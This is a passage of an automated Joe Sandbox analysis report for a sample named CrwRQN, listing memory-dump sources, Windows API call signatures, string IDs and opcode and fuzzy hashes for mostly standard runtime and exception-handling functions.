                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Value
                                    • String ID:
                                    • API String ID: 3702945584-0
                                    • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                    • Instruction ID: a3040c9f0bd860cd4096ce5600fb2b9654eb805d6d11ac1ce0cd4cac384aa4e9
                                    • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                    • Instruction Fuzzy Hash: A7115E14F0DA0369FB686633441117911418F40F70FC407FBD47E4A2FBEE6CB4628200
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CallEncodePointerTranslator
                                    • String ID: MOC$RCC
                                    • API String ID: 3544855599-2084237596
                                    • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                    • Instruction ID: d321c9a5b9f7a5a317f66254400fb3802ae7aaa4ca47213e532ab7dc094fe746
                                    • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                    • Instruction Fuzzy Hash: FB91A373B08B918AE710DB76D4402BD7BA0F744B98F5041BAEA4D17769DF38D1A5C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 2395640692-1018135373
                                    • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                    • Instruction ID: 30b82e09e33c88abec56751e42bfe6fa0218b432fd5cb71e155a11368b423caf
                                    • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                    • Instruction Fuzzy Hash: 16519132B19A428ADB14CB16D444A7CB391EB44FA4F9081B2DA4E4776EEF7DF961C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CallEncodePointerTranslator
                                    • String ID: MOC$RCC
                                    • API String ID: 3544855599-2084237596
                                    • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                    • Instruction ID: 14a608cb08d6450631badf2c8110568233adeadac19c13d0854936886947bbf2
                                    • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                    • Instruction Fuzzy Hash: B7619532A08BC581D7609B26E4403BDB7A0FB84BA4F544276EB9C07B69DF7CD1A0CB41
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                    • String ID: csm$csm
                                    • API String ID: 3896166516-3733052814
                                    • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                    • Instruction ID: c7b56bb28c75b4f2009f6fa7be42b648bcc16fe8fea5c069f5164e03fcd3ee6b
                                    • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                    • Instruction Fuzzy Hash: B751A232748B428ADB648B23944437C7A90EB54FA5F9441F7DA4D43BAADF7CE460C742
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: AddressHandleLoadModuleProc
                                    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                    • API String ID: 3055805555-3733552308
                                    • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                    • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                    • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                    • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Process$CurrentSizeWorking
                                    • String ID: Shrinking process size
                                    • API String ID: 2122760700-652428428
                                    • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                    • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                    • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                    • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Enter$Leave
                                    • String ID:
                                    • API String ID: 2801635615-0
                                    • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                    • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                    • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                    • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                    • String ID:
                                    • API String ID: 2718003287-0
                                    • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                    • Instruction ID: 6e7fc9e80d4ddd1c41c4c7eed939f477fba48849c8c1c4e704909d664f5b4b1b
                                    • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                    • Instruction Fuzzy Hash: 00D1E372B18A8189E721CF66D4412FC37B1FB44BA8B8042B6DE5D57BA9DF38D526C340
                                    APIs
                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A4CED07), ref: 00007FFE1A4CEE38
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A4CED07), ref: 00007FFE1A4CEEC3
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ConsoleErrorLastMode
                                    • String ID:
                                    • API String ID: 953036326-0
                                    • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                    • Instruction ID: afd83536cc1f61d7836c5aa0559d4b6dfc904624459ab29f98e8296eb292d386
                                    • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                    • Instruction Fuzzy Hash: 9291C5B2B18E5295F7709F67944127C2BA0AB04FA8F9441F6DE4E576A9DF3CD452C300
                                    APIs
                                    • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                    • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                    • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                    • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalEventSection$EnterLeaveReset
                                    • String ID:
                                    • API String ID: 3553466030-0
                                    • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                    • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                    • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                    • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CriticalEventSection$EnterLeaveReset
                                    • String ID:
                                    • API String ID: 3553466030-0
                                    • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                    • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                    • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                    • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                    • String ID:
                                    • API String ID: 2933794660-0
                                    • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                    • Instruction ID: ce34d0f9bcb6bf2d8f0bcd284f7827bfdd9abd65d0c84f530de47059a6a44696
                                    • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                    • Instruction Fuzzy Hash: 27111C32B15F018AEB008B61E8552B833A4F769B68F440A72DA6D467A4EF78D169C340
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CreateEvent$CriticalInitializeSection
                                    • String ID:
                                    • API String ID: 926662266-0
                                    • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                    • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                    • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                    • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: __except_validate_context_record
                                    • String ID: csm$csm
                                    • API String ID: 1467352782-3733052814
                                    • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                    • Instruction ID: 6d9dfd6714d99977a6c2f4f3e8b3415d766628745e0890427d86838c34e09f76
                                    • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                    • Instruction Fuzzy Hash: 91719272708A8186D7608F26944477D7BA0FB44FA8F5481B6EE8C47AADCF3CE561C781
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CreateFrameInfo__except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 2558813199-1018135373
                                    • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                    • Instruction ID: 24a6eb08eaa41a383efe67bfb3ef7008bd49ecee1b20ea1fa6d4cc8e50abf946
                                    • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                    • Instruction Fuzzy Hash: 30513E36618B4196D720EF16A04027DB7A4FB89FA0F5011B6DB8D07B69CF38F4A1CB45
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: U
                                    • API String ID: 442123175-4171548499
                                    • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                    • Instruction ID: bdaace7d92299ae9959f2aa4305b7f83bafa1a0df8f7ae5e0131d6021fee6584
                                    • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                    • Instruction Fuzzy Hash: 1641C572B19E8181DB20CF26E4453B96761FB98BA4F804072EE4E877A9EF3CD451CB40
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID: csm
                                    • API String ID: 3997070919-1018135373
                                    • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                    • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                    • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                    • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                    APIs
                                      • Part of subcall function 00007FFE1A4C3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A4C3A63
                                    • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A4D0993
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: CheckCommonHandler__except_validate_context_record
                                    • String ID: csm$f
                                    • API String ID: 1543384424-629598281
                                    • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                    • Instruction ID: 6effcd194485b46bae9c67cf69698cce734259e0e3b757ca6b098030996ab0b1
                                    • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                    • Instruction Fuzzy Hash: 2111E432B14B8585E7109F13A04127DA764EB94FE4F4880F6EE8D07B6ACE38E961C740
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: TimerWaitable
                                    • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                    • API String ID: 1823812067-484248852
                                    • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                    • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                    • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                    • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                    APIs
                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A4C112F), ref: 00007FFE1A4C39E0
                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A4C112F), ref: 00007FFE1A4C3A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727823859.00007FFE1A4C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A4C0000, based on PE: true
                                    • Associated: 00000005.00000002.2727798107.00007FFE1A4C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727917117.00007FFE1A4D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727935928.00007FFE1A4DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000005.00000002.2727952107.00007FFE1A4DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_7ffe1a4c0000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: ExceptionFileHeaderRaise
                                    • String ID: csm
                                    • API String ID: 2573137834-1018135373
                                    • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                    • Instruction ID: 3a4a5732787e7bff694b05738a7d6f4c944c822453834177945c66976f13aa72
                                    • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
